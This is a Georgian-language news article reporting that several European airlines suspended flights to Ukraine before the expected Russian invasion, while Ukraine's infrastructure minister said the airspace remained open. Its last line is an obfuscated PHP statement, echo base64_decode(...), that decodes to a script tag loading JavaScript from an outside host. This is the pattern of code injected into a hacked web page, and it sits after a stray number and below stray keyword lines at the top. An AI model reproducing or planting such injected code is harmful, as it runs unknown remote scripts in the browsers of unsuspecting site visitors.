gorgia
ავერსი jaluzi
უკრაინაში რუსეთის სამხედრო ძალების შეჭრის რისკის ფონზე, ათამდე ავიაკომპანიამ უკრაინის მიმართულებით ფრენები შეაჩერა.
 
უკრაინაში აცხადებენ, რომ ეს ნაბიჯი ფრენების უსაფრთხოების დონის შემცირებით არ არის განპირობებული და საჰაერო სივრცე ღია რჩება.
 
BBC-ის ცნობით, არაერთმა ევროპულმა ავიაკომპანიამ გამოაცხადა, რომ ან აჩერებენ, ან ამცირებენ ფრენებს უკრაინის მიმართულებით, რის მიზეზადაც უსაფრთხოების რისკებს ასახელებენ.
 
მაგალითად, გერმანულმა კომპანია „ლუფთანზამ“ (Lufthansa) გამოაცხადა, რომ 21 თებერვლიდან წყვეტს ფრენებს, რითაც შეუერთდა ნიდერლანდურ ავიაკომპანია KLM-ს, რომელსაც უკვე შეჩერებული აქვს ფრენები.
 
„ეარ ფრანსმა“ (Air France) 21 თებერვალსვე განაცხადა, რომ 22 თებერვლისთვის დაგეგმილ ფრენებს აჩერებს, თუმცა ასევე განაცხადა, რომ ეს „პრევენციული ზომაა“ და კომპანია „რეგულარულად შეაფასებს სიტუაციას“.
 
უკრაინის ინფრასტრუქტურის მინისტრი აცხადებს, რომ ქვეყნის საჰაერო სივრცე ღია რჩება.
 
„არაერთი უცხოური ავიაკომპანიის მიერ ფრენების გაუქმება ნაკარნახევია მხოლოდ ვითარების საინფორმაციო გამწვავებით და არა ფრენების უსაფრთხოების დონის რეალური ცვლილებით“, – განაცხადა ოლექსანდერ კუბრაკოვმა პრესკონფერენციაზე.
 
მან ასევე განაცხადა, რომ მთავრობა „მუშაობს, რათა ჩანაცვლდეს გაუქმებული ფრენები“ და დასძინა, რომ უკრაინის საერთაშორისო ავიახაზზებმა უკვე დაიწყო დამატებითი ფრენების დაგეგმვა.
 
რამდენიმე კვირაა, დასავლეთის ქვეყნები უკრაინაში რუსეთის შეჭრის საფრთხეზე საუბრობენ, 18 თებერვალს კი აშშ-ის პრეზიდენტმა თქვა, რომ ვლადიმერ პუტინმა უკვე მიიღო უკრაინაზე თავდასხმის გადაწყვეტილება. მოსკოვი ამას უარყოფს.
821
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");